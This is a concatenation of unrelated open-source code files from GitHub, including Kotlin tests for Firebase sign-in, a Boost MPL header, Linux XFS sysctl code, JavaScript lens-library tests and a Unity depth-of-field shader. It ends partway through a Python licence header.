LiveDataTestUtil.getValue(subject.currentUserInfo)?.getUid()
)
assertEquals(
user.getPhotoUrl(),
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertTrue(subject.isSignedIn())
assertFalse(subject.isRegistered())
}
@Test
fun testPostSignIn() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.emitSignInRequest()
// Check that the emitted event is a sign in request
assertEquals(
LiveDataTestUtil.getValue(subject.performSignInEvent)?.peekContent(),
SignInEvent.RequestSignIn
)
}
@Test
fun testPostSignOut() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.emitSignOutRequest()
assertEquals(
LiveDataTestUtil.getValue(subject.performSignInEvent)?.peekContent(),
SignInEvent.RequestSignOut
)
}
private fun createNotificationsPrefIsShownUseCase(): NotificationsPrefIsShownUseCase {
return NotificationsPrefIsShownUseCase(
FakePreferenceStorage(),
coroutineRule.testDispatcher
)
}
private fun createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase: ObserveUserAuthStateUseCase =
FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(true),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher),
notificationsPrefIsShownUseCase: NotificationsPrefIsShownUseCase =
createNotificationsPrefIsShownUseCase(),
ioDispatcher: CoroutineDispatcher = coroutineRule.testDispatcher,
mainDispatcher: CoroutineDispatcher = coroutineRule.testDispatcher,
isReservationEnabledByRemoteConfig: Boolean = true
): FirebaseSignInViewModelDelegate {
return FirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase,
notificationsPrefIsShownUseCase,
ioDispatcher,
mainDispatcher,
isReservationEnabledByRemoteConfig
)
}
}
| {
"pile_set_name": "Github"
} |
function anonymous(_swig,_ctx,_filters,_utils,_fn) {
var _ext = _swig.extensions,
_output = "";
_output += "<h1>";
if (((typeof _ctx.foo !== "undefined") ? ((typeof _ctx.foo !== "undefined") ? _ctx.foo : "") : ((typeof foo !== "undefined") ? foo : ""))) {
_output += "Bar";
}_output += "</h1>";
return _output;
} | {
"pile_set_name": "Github"
} |
package net.corda.testing.internal.db
import org.junit.jupiter.api.Test
@GroupB
class GroupBTests {
@Test()
fun setExpectations() {
AssertingTestDatabaseContext.addExpectations("groupB",
"forClassGroupBTests-setup", "specialSql1-setup", "specialSql1-teardown", "forClassGroupBTests-teardown")
}
@Test()
fun noSpecialSqlRequired() {
}
@Test()
@SpecialSql1
fun someSpecialSqlRequired() {
}
} | {
"pile_set_name": "Github"
} |
package MyTest::Constants;
use constant LIBRARY_CONST1 => 1;
use constant {
'LIBRARY_CONST2' => 1,
qw/LIBRARY_CONST3 42 LIBRARY_CONST4 42/
};
1; | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<vector xmlns:android="http://schemas.android.com/apk/res/android" android:height="24dp" android:viewportHeight="24.0" android:viewportWidth="24.0" android:width="24dp">
<path android:fillColor="#FFFFFF" android:pathData="M9,16.2L4.8,12l-1.4,1.4L9,19 21,7l-1.4,-1.4L9,16.2z"/>
</vector>
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2008
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// *Preprocessed* version of the main "apply_wrap.hpp" header
// -- DO NOT modify by hand!
namespace autoboost { namespace mpl {
template<
int N, typename F
>
struct apply_wrap_impl0;
template< typename F, bool F_has_apply >
struct apply_wrap_impl0_bcb {
typedef typename F::template apply<na> type;
};
template< typename F >
struct apply_wrap_impl0_bcb< F,true > {
typedef typename F::apply type;
};
template<
typename F
>
struct apply_wrap_impl0<
0
, F
>
{
typedef apply_wrap_impl0_bcb< F, aux::has_apply<F>::value >::type type;
};
template<
typename F
>
struct apply_wrap_impl0<
1
, F
>
{
typedef typename F::template apply<
na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
2
, F
>
{
typedef typename F::template apply<
na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
3
, F
>
{
typedef typename F::template apply<
na, na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
4
, F
>
{
typedef typename F::template apply<
na, na, na, na
> type;
};
template<
typename F
>
struct apply_wrap_impl0<
5
, F
>
{
typedef typename F::template apply<
na, na, na, na, na
> type;
};
template<
typename F
>
struct apply_wrap0
: apply_wrap_impl0<
::autoboost::mpl::aux::arity< F,0 >::value
, F
>::type
{
};
template<
int N, typename F, typename T1
>
struct apply_wrap_impl1;
template<
typename F, typename T1
>
struct apply_wrap_impl1<
1
, F
, T1
>
{
typedef typename F::template apply<
T1
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
2
, F
, T1
>
{
typedef typename F::template apply<
T1
, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
3
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
4
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap_impl1<
5
, F
, T1
>
{
typedef typename F::template apply<
T1
, na, na, na, na
> type;
};
template<
typename F, typename T1
>
struct apply_wrap1
: apply_wrap_impl1<
::autoboost::mpl::aux::arity< F,1 >::value
, F
, T1
>::type
{
};
template<
int N, typename F, typename T1, typename T2
>
struct apply_wrap_impl2;
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
2
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
3
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
4
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap_impl2<
5
, F
, T1, T2
>
{
typedef typename F::template apply<
T1, T2
, na, na, na
> type;
};
template<
typename F, typename T1, typename T2
>
struct apply_wrap2
: apply_wrap_impl2<
::autoboost::mpl::aux::arity< F,2 >::value
, F
, T1, T2
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3;
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
3
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
4
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap_impl3<
5
, F
, T1, T2, T3
>
{
typedef typename F::template apply<
T1, T2, T3
, na, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3
>
struct apply_wrap3
: apply_wrap_impl3<
::autoboost::mpl::aux::arity< F,3 >::value
, F
, T1, T2, T3
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4;
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4<
4
, F
, T1, T2, T3, T4
>
{
typedef typename F::template apply<
T1, T2, T3, T4
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap_impl4<
5
, F
, T1, T2, T3, T4
>
{
typedef typename F::template apply<
T1, T2, T3, T4
, na
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
>
struct apply_wrap4
: apply_wrap_impl4<
::autoboost::mpl::aux::arity< F,4 >::value
, F
, T1, T2, T3, T4
>::type
{
};
template<
int N, typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap_impl5;
template<
typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap_impl5<
5
, F
, T1, T2, T3, T4, T5
>
{
typedef typename F::template apply<
T1, T2, T3, T4, T5
> type;
};
template<
typename F, typename T1, typename T2, typename T3, typename T4
, typename T5
>
struct apply_wrap5
: apply_wrap_impl5<
::autoboost::mpl::aux::arity< F,5 >::value
, F
, T1, T2, T3, T4, T5
>::type
{
};
}}
| {
"pile_set_name": "Github"
} |
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.flowable.eventregistry.rest.service.api.repository;
import java.io.InputStream;
import java.util.List;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.io.IOUtils;
import org.apache.http.entity.ContentType;
import org.flowable.common.engine.api.FlowableException;
import org.flowable.common.engine.api.FlowableIllegalArgumentException;
import org.flowable.common.engine.api.FlowableObjectNotFoundException;
import org.flowable.common.rest.resolver.ContentTypeResolver;
import org.flowable.eventregistry.api.EventDeployment;
import org.flowable.eventregistry.api.EventRepositoryService;
import org.flowable.eventregistry.rest.service.api.EventRegistryRestApiInterceptor;
import org.springframework.beans.factory.annotation.Autowired;
/**
* @author Tijs Rademakers
*/
public class BaseDeploymentResourceDataResource {
@Autowired
protected ContentTypeResolver contentTypeResolver;
@Autowired
protected EventRepositoryService repositoryService;
@Autowired(required=false)
protected EventRegistryRestApiInterceptor restApiInterceptor;
protected byte[] getDeploymentResourceData(String deploymentId, String resourceName, HttpServletResponse response) {
if (deploymentId == null) {
throw new FlowableIllegalArgumentException("No deployment id provided");
}
if (resourceName == null) {
throw new FlowableIllegalArgumentException("No resource name provided");
}
// Check if deployment exists
EventDeployment deployment = repositoryService.createDeploymentQuery().deploymentId(deploymentId).singleResult();
if (deployment == null) {
throw new FlowableObjectNotFoundException("Could not find a deployment with id '" + deploymentId + "'.", EventDeployment.class);
}
if (restApiInterceptor != null) {
restApiInterceptor.accessDeploymentById(deployment);
}
List<String> resourceList = repositoryService.getDeploymentResourceNames(deploymentId);
if (resourceList.contains(resourceName)) {
final InputStream resourceStream = repositoryService.getResourceAsStream(deploymentId, resourceName);
String contentType = null;
if (resourceName.toLowerCase().endsWith(".event") || resourceName.toLowerCase().endsWith(".channel")) {
contentType = ContentType.APPLICATION_JSON.getMimeType();
} else {
contentType = contentTypeResolver.resolveContentType(resourceName);
}
response.setContentType(contentType);
try {
return IOUtils.toByteArray(resourceStream);
} catch (Exception e) {
throw new FlowableException("Error converting resource stream", e);
}
} else {
// Resource not found in deployment
throw new FlowableObjectNotFoundException("Could not find a resource with name '" + resourceName + "' in deployment '" + deploymentId + "'.", String.class);
}
}
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0
/*
* Copyright (c) 2001-2005 Silicon Graphics, Inc.
* All Rights Reserved.
*/
#include "xfs.h"
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include "xfs_error.h"
#include "xfs_stats.h"
static struct ctl_table_header *xfs_table_header;
#ifdef CONFIG_PROC_FS
STATIC int
xfs_stats_clear_proc_handler(
struct ctl_table *ctl,
int write,
void __user *buffer,
size_t *lenp,
loff_t *ppos)
{
int ret, *valp = ctl->data;
ret = proc_dointvec_minmax(ctl, write, buffer, lenp, ppos);
if (!ret && write && *valp) {
xfs_stats_clearall(xfsstats.xs_stats);
xfs_stats_clear = 0;
}
return ret;
}
STATIC int
xfs_panic_mask_proc_handler(
struct ctl_table *ctl,
int write,
void __user *buffer,
size_t *lenp,
loff_t *ppos)
{
int ret, *valp = ctl->data;
ret = proc_dointvec_minmax(ctl, write, buffer, lenp, ppos);
if (!ret && write) {
xfs_panic_mask = *valp;
#ifdef DEBUG
xfs_panic_mask |= (XFS_PTAG_SHUTDOWN_CORRUPT | XFS_PTAG_LOGRES);
#endif
}
return ret;
}
#endif /* CONFIG_PROC_FS */
static struct ctl_table xfs_table[] = {
{
.procname = "irix_sgid_inherit",
.data = &xfs_params.sgid_inherit.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.sgid_inherit.min,
.extra2 = &xfs_params.sgid_inherit.max
},
{
.procname = "irix_symlink_mode",
.data = &xfs_params.symlink_mode.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.symlink_mode.min,
.extra2 = &xfs_params.symlink_mode.max
},
{
.procname = "panic_mask",
.data = &xfs_params.panic_mask.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = xfs_panic_mask_proc_handler,
.extra1 = &xfs_params.panic_mask.min,
.extra2 = &xfs_params.panic_mask.max
},
{
.procname = "error_level",
.data = &xfs_params.error_level.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.error_level.min,
.extra2 = &xfs_params.error_level.max
},
{
.procname = "xfssyncd_centisecs",
.data = &xfs_params.syncd_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.syncd_timer.min,
.extra2 = &xfs_params.syncd_timer.max
},
{
.procname = "inherit_sync",
.data = &xfs_params.inherit_sync.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_sync.min,
.extra2 = &xfs_params.inherit_sync.max
},
{
.procname = "inherit_nodump",
.data = &xfs_params.inherit_nodump.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nodump.min,
.extra2 = &xfs_params.inherit_nodump.max
},
{
.procname = "inherit_noatime",
.data = &xfs_params.inherit_noatim.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_noatim.min,
.extra2 = &xfs_params.inherit_noatim.max
},
{
.procname = "inherit_nosymlinks",
.data = &xfs_params.inherit_nosym.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nosym.min,
.extra2 = &xfs_params.inherit_nosym.max
},
{
.procname = "rotorstep",
.data = &xfs_params.rotorstep.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.rotorstep.min,
.extra2 = &xfs_params.rotorstep.max
},
{
.procname = "inherit_nodefrag",
.data = &xfs_params.inherit_nodfrg.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.inherit_nodfrg.min,
.extra2 = &xfs_params.inherit_nodfrg.max
},
{
.procname = "filestream_centisecs",
.data = &xfs_params.fstrm_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.fstrm_timer.min,
.extra2 = &xfs_params.fstrm_timer.max,
},
{
.procname = "speculative_prealloc_lifetime",
.data = &xfs_params.eofb_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.eofb_timer.min,
.extra2 = &xfs_params.eofb_timer.max,
},
{
.procname = "speculative_cow_prealloc_lifetime",
.data = &xfs_params.cowb_timer.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = proc_dointvec_minmax,
.extra1 = &xfs_params.cowb_timer.min,
.extra2 = &xfs_params.cowb_timer.max,
},
/* please keep this the last entry */
#ifdef CONFIG_PROC_FS
{
.procname = "stats_clear",
.data = &xfs_params.stats_clear.val,
.maxlen = sizeof(int),
.mode = 0644,
.proc_handler = xfs_stats_clear_proc_handler,
.extra1 = &xfs_params.stats_clear.min,
.extra2 = &xfs_params.stats_clear.max
},
#endif /* CONFIG_PROC_FS */
{}
};
static struct ctl_table xfs_dir_table[] = {
{
.procname = "xfs",
.mode = 0555,
.child = xfs_table
},
{}
};
static struct ctl_table xfs_root_table[] = {
{
.procname = "fs",
.mode = 0555,
.child = xfs_dir_table
},
{}
};
int
xfs_sysctl_register(void)
{
xfs_table_header = register_sysctl_table(xfs_root_table);
if (!xfs_table_header)
return -ENOMEM;
return 0;
}
void
xfs_sysctl_unregister(void)
{
unregister_sysctl_table(xfs_table_header);
}
| {
"pile_set_name": "Github"
} |
"use strict";
var _ = require('lodash'),
nanoscope = require('../index'),
PathLens = nanoscope.PathLens,
headLens = nanoscope.headLens,
utils = require('./utils');
describe('PathLens', function () {
var testJS, testLens;
beforeEach(function () {
testJS = {
a: {
b: 'c'
}
};
testLens = new PathLens('a.b');
});
describe('#get', function () {
it('should return c', function () {
testLens.get(testJS).should.equal('c');
});
});
describe('#set', function () {
it('should return a new object with modified obj.a.b', function () {
testLens.set(testJS, 9).a.b.should.equal(9);
});
it('should add a property even if it isnt there', function () {
var lens = new PathLens('a.b.c.d.e.f');
lens.set({a : { b: 'c' } }, 'hello').a.b.c.d.e.f.should.equal('hello');
});
});
describe('#map', function () {
it('should turn testJS.a.b into cat', function () {
testLens.map(testJS, function (attr) { return attr + 'at'; }).a.b.should.equal('cat');
});
it('should not modify a deeply nested value if it doesnt exist', function () {
var lens = new PathLens('a.b.c.d.e.f');
lens.map({a : { b: 'c' } }, function (attr) { return attr; }).a.b.should.not.have.property('c');
});
it('should return a new object with modified obj.a.b', function () {
var _ = testLens.map({ a : { b : 'c' } }, function (attr) { return attr + 'at'; });
testJS.a.b.should.equal('c');
});
it('should create object structure if necessary', function () {
testLens.map(undefined, function(attr) { return attr + 'at'; }).a.b.should.equal('undefinedat');
});
});
describe('#PathLens.Unsafe', function () {
describe('#get', function () {
var lens = new PathLens.Unsafe('a.b');
it('should not fail when trying to get an attribute that exists', function () {
lens.get({a: { b: 10}}).should.equal(10);
});
it('should fail when trying to get an attribute that does not exist', function () {
try {
lens.get({});
} catch (ex) {
ex.message.should.equal('Cannot read property \'b\' of undefined');
}
});
});
describe('#set', function () {
var lens = new PathLens.Unsafe('a.b');
it('should not fail when trying to set an attribute that exists', function () {
lens.set({a: { b: 10}}, 20).a.b.should.equal(20);
});
it('should fail when trying to set an attribute that does not exist', function () {
try {
lens.set({}, 10);
} catch (ex) {
ex.message.should.equal('Cannot read property \'b\' of undefined');
}
});
});
});
describe('#deriveLenses', function () {
var obj;
beforeEach(function () {
obj = { a: { b: { c: { d: { e: 'hello' }, f: 10 }}}};
});
it('should return lenses for each path in object', function () {
var lenses = PathLens.deriveLenses(obj),
paths = _.keys(lenses);
utils.testArrayEquals(
paths,
[ 'a', 'a.b', 'a.b.c', 'a.b.c.d', 'a.b.c.d.e', 'a.b.c.f' ]
);
lenses['a.b.c.d.e'].get(obj).should.equal('hello');
});
it('should not include array indices', function () {
obj.a.b.c.d.e = [1, 2, 3, 4, 5];
var lenses = PathLens.deriveLenses(obj),
paths = _.keys(lenses);
utils.testArrayEquals(
paths,
[ 'a', 'a.b', 'a.b.c', 'a.b.c.d', 'a.b.c.d.e', 'a.b.c.f' ]
);
utils.testArrayEquals(lenses['a.b.c.d.e'].get(obj), [1, 2, 3, 4, 5]);
});
});
describe('#addPath', function () {
var obj = { a: 1, b : { c: 2 }},
lens = new PathLens('a').addPath('b.c').view(obj);
it('should get properly', function () {
utils.testArrayEquals(
lens.get(),
[1, 2]
);
});
it('should map properly', function () {
expect(lens.map(function (elem) { return elem * 2; })).to.eql({
a: 2,
b: {
c: 4
}
});
});
});
describe('#composePath', function () {
var obj = { a: 1, b : { c: 2 }},
lens = new PathLens('b').composePath('c').view(obj);
it('should compose properly with an IndexedLens', function () {
var arr = [{a: 'foo'}];
headLens.composePath('a').view(arr).get().should.equal('foo');
});
it('should get properly', function () {
expect(lens.get()).to.equal(2);
});
it('should map properly', function () {
expect(lens.map(function (elem) { return elem * 2; })).to.eql({
a: 1,
b: {
c: 4
}
});
});
it('should still throw errors if unsafe flag is set', function () {
var failLens = new PathLens.Unsafe('b').composePath('d.e').view(obj);
expect(function () {
failLens.get();
}).to.throw(TypeError, 'Cannot read property \'e\' of undefined');
});
});
});
| {
"pile_set_name": "Github"
} |
#ifndef __DEPTH_OF_FIELD__
#define __DEPTH_OF_FIELD__
#if SHADER_TARGET >= 50
// Use separate texture/sampler objects on Shader Model 5.0
#define SEPARATE_TEXTURE_SAMPLER
#define DOF_DECL_TEX2D(tex) Texture2D tex; SamplerState sampler##tex
#define DOF_TEX2D(tex, coord) tex.Sample(sampler##tex, coord)
#else
#define DOF_DECL_TEX2D(tex) sampler2D tex
#define DOF_TEX2D(tex, coord) tex2D(tex, coord)
#endif
#include "Common.cginc"
#include "DiskKernels.cginc"
DOF_DECL_TEX2D(_CameraDepthTexture);
DOF_DECL_TEX2D(_CameraMotionVectorsTexture);
DOF_DECL_TEX2D(_CoCTex);
// Camera parameters
float _Distance;
float _LensCoeff; // f^2 / (N * (S1 - f) * film_width * 2)
float _MaxCoC;
float _RcpMaxCoC;
float _RcpAspect;
half3 _TaaParams; // Jitter.x, Jitter.y, Blending
struct VaryingsDOF
{
float4 pos : SV_POSITION;
half2 uv : TEXCOORD0;
half2 uvAlt : TEXCOORD1;
};
// Common vertex shader with single pass stereo rendering support
VaryingsDOF VertDOF(AttributesDefault v)
{
half2 uvAlt = v.texcoord;
#if UNITY_UV_STARTS_AT_TOP
if (_MainTex_TexelSize.y < 0.0) uvAlt.y = 1.0 - uvAlt.y;
#endif
VaryingsDOF o;
o.pos = UnityObjectToClipPos(v.vertex);
#if defined(UNITY_SINGLE_PASS_STEREO)
o.uv = UnityStereoScreenSpaceUVAdjust(v.texcoord, _MainTex_ST);
o.uvAlt = UnityStereoScreenSpaceUVAdjust(uvAlt, _MainTex_ST);
#else
o.uv = v.texcoord;
o.uvAlt = uvAlt;
#endif
return o;
}
// CoC calculation
half4 FragCoC(VaryingsDOF i) : SV_Target
{
float depth = LinearEyeDepth(DOF_TEX2D(_CameraDepthTexture, i.uv));
half coc = (depth - _Distance) * _LensCoeff / max(depth, 1e-5);
return saturate(coc * 0.5 * _RcpMaxCoC + 0.5);
}
// Temporal filter
half4 FragTempFilter(VaryingsDOF i) : SV_Target
{
float3 uvOffs = _MainTex_TexelSize.xyy * float3(1, 1, 0);
#if defined(SEPARATE_TEXTURE_SAMPLER)
half4 cocTL = _CoCTex.GatherRed(sampler_CoCTex, i.uv - uvOffs.xy * 0.5); // top-left
half4 cocBR = _CoCTex.GatherRed(sampler_CoCTex, i.uv + uvOffs.xy * 0.5); // bottom-right
half coc1 = cocTL.x; // top
half coc2 = cocTL.z; // left
half coc3 = cocBR.x; // bottom
half coc4 = cocBR.z; // right
#else
half coc1 = DOF_TEX2D(_CoCTex, i.uv - uvOffs.xz).r; // top
half coc2 = DOF_TEX2D(_CoCTex, i.uv - uvOffs.zy).r; // left
half coc3 = DOF_TEX2D(_CoCTex, i.uv + uvOffs.zy).r; // bottom
half coc4 = DOF_TEX2D(_CoCTex, i.uv + uvOffs.xz).r; // right
#endif
// Dejittered center sample.
half coc0 = DOF_TEX2D(_CoCTex, i.uv - _TaaParams.xy).r;
// CoC dilation: determine the closest point in the four neighbors.
float3 closest = float3(0, 0, coc0);
closest = coc1 < closest.z ? float3(-uvOffs.xz, coc1) : closest;
closest = coc2 < closest.z ? float3(-uvOffs.zy, coc2) : closest;
closest = coc3 < closest.z ? float3(+uvOffs.zy, coc3) : closest;
closest = coc4 < closest.z ? float3(+uvOffs.xz, coc4) : closest;
// Sample the history buffer with the motion vector at the closest point.
float2 motion = DOF_TEX2D(_CameraMotionVectorsTexture, i.uv + closest.xy).xy;
half cocHis = DOF_TEX2D(_MainTex, i.uv - motion).r;
// Neighborhood clamping.
half cocMin = closest.z;
half cocMax = max(max(max(max(coc0, coc1), coc2), coc3), coc4);
cocHis = clamp(cocHis, cocMin, cocMax);
// Blend with the history.
return lerp(coc0, cocHis, _TaaParams.z);
}
// Prefilter: downsampling and premultiplying.
half4 FragPrefilter(VaryingsDOF i) : SV_Target
{
#if defined(SEPARATE_TEXTURE_SAMPLER)
// Sample source colors.
half4 c_r = _MainTex.GatherRed (sampler_MainTex, i.uv);
half4 c_g = _MainTex.GatherGreen(sampler_MainTex, i.uv);
half4 c_b = _MainTex.GatherBlue (sampler_MainTex, i.uv);
half3 c0 = half3(c_r.x, c_g.x, c_b.x);
half3 c1 = half3(c_r.y, c_g.y, c_b.y);
half3 c2 = half3(c_r.z, c_g.z, c_b.z);
half3 c3 = half3(c_r.w, c_g.w, c_b.w);
// Sample CoCs.
half4 cocs = _CoCTex.Gather(sampler_CoCTex, i.uvAlt) * 2.0 - 1.0;
half coc0 = cocs.x;
half coc1 = cocs.y;
half coc2 = cocs.z;
half coc3 = cocs.w;
#else
float3 duv = _MainTex_TexelSize.xyx * float3(0.5, 0.5, -0.5);
// Sample source colors.
half3 c0 = DOF_TEX2D(_MainTex, i.uv - duv.xy).rgb;
half3 c1 = DOF_TEX2D(_MainTex, i.uv - duv.zy).rgb;
half3 c2 = DOF_TEX2D(_MainTex, i.uv + duv.zy).rgb;
half3 c3 = DOF_TEX2D(_MainTex, i.uv + duv.xy).rgb;
// Sample CoCs.
half coc0 = DOF_TEX2D(_CoCTex, i.uvAlt - duv.xy).r * 2.0 - 1.0;
half coc1 = DOF_TEX2D(_CoCTex, i.uvAlt - duv.zy).r * 2.0 - 1.0;
half coc2 = DOF_TEX2D(_CoCTex, i.uvAlt + duv.zy).r * 2.0 - 1.0;
half coc3 = DOF_TEX2D(_CoCTex, i.uvAlt + duv.xy).r * 2.0 - 1.0;
#endif
// Apply CoC and luma weights to reduce bleeding and flickering.
float w0 = abs(coc0) / (Max3(c0) + 1.0);
float w1 = abs(coc1) / (Max3(c1) + 1.0);
float w2 = abs(coc2) / (Max3(c2) + 1.0);
float w3 = abs(coc3) / (Max3(c3) + 1.0);
// Weighted average of the color samples
half3 avg = c0 * w0 + c1 * w1 + c2 * w2 + c3 * w3;
avg /= max(w0 + w1 + w2 + w3, 1e-5);
// Select the largest CoC value.
half coc_min = Min4(coc0, coc1, coc2, coc3);
half coc_max = Max4(coc0, coc1, coc2, coc3);
half coc = (-coc_min > coc_max ? coc_min : coc_max) * _MaxCoC;
// Premultiply CoC again.
avg *= smoothstep(0, _MainTex_TexelSize.y * 2, abs(coc));
#if defined(UNITY_COLORSPACE_GAMMA)
avg = GammaToLinearSpace(avg);
#endif
return half4(avg, coc);
}
// Bokeh filter with disk-shaped kernels
half4 FragBlur(VaryingsDOF i) : SV_Target
{
half4 samp0 = DOF_TEX2D(_MainTex, i.uv);
half4 bgAcc = 0.0; // Background: far field bokeh
half4 fgAcc = 0.0; // Foreground: near field bokeh
UNITY_LOOP for (int si = 0; si < kSampleCount; si++)
{
float2 disp = kDiskKernel[si] * _MaxCoC;
float dist = length(disp);
float2 duv = float2(disp.x * _RcpAspect, disp.y);
half4 samp = DOF_TEX2D(_MainTex, i.uv + duv);
// BG: Compare CoC of the current sample and the center sample
// and select smaller one.
half bgCoC = max(min(samp0.a, samp.a), 0.0);
// Compare the CoC to the sample distance.
// Add a small margin to smooth out.
const half margin = _MainTex_TexelSize.y * 2;
half bgWeight = saturate((bgCoC - dist + margin) / margin);
half fgWeight = saturate((-samp.a - dist + margin) / margin);
// Cut influence from focused areas because they're darkened by CoC
// premultiplying. This is only needed for near field.
fgWeight *= step(_MainTex_TexelSize.y, -samp.a);
// Accumulation
bgAcc += half4(samp.rgb, 1.0) * bgWeight;
fgAcc += half4(samp.rgb, 1.0) * fgWeight;
}
// Get the weighted average.
bgAcc.rgb /= bgAcc.a + (bgAcc.a == 0.0); // zero-div guard
fgAcc.rgb /= fgAcc.a + (fgAcc.a == 0.0);
// BG: Calculate the alpha value only based on the center CoC.
// This is a rather aggressive approximation but provides stable results.
bgAcc.a = smoothstep(_MainTex_TexelSize.y, _MainTex_TexelSize.y * 2.0, samp0.a);
// FG: Normalize the total of the weights.
fgAcc.a *= UNITY_PI / kSampleCount;
// Alpha premultiplying
half alpha = saturate(fgAcc.a);
half3 rgb = lerp(bgAcc.rgb, fgAcc.rgb, alpha);
return half4(rgb, alpha);
}
// Postfilter blur
half4 FragPostBlur(VaryingsDOF i) : SV_Target
{
// 9 tap tent filter with 4 bilinear samples
const float4 duv = _MainTex_TexelSize.xyxy * float4(0.5, 0.5, -0.5, 0);
half4 acc;
acc = DOF_TEX2D(_MainTex, i.uv - duv.xy);
acc += DOF_TEX2D(_MainTex, i.uv - duv.zy);
acc += DOF_TEX2D(_MainTex, i.uv + duv.zy);
acc += DOF_TEX2D(_MainTex, i.uv + duv.xy);
return acc / 4.0;
}
#endif // __DEPTH_OF_FIELD__
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
#
# Constants for the generation of patches for CBMC proofs.
#
# Copyright (C) 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
